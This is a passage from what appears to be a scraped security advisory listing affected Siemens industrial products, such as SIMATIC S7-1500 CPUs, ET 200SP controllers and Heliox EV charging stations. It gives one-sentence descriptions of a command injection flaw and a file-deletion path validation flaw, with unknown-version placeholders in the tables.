vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
The application executes shell commands constructed from user input, exposing it to command injection vulnerabilities that can lead to full system compromise.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
The application fails to properly validate file paths during deletion, enabling attackers to delete authorized files or sockets, potentially causing service disruption or denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
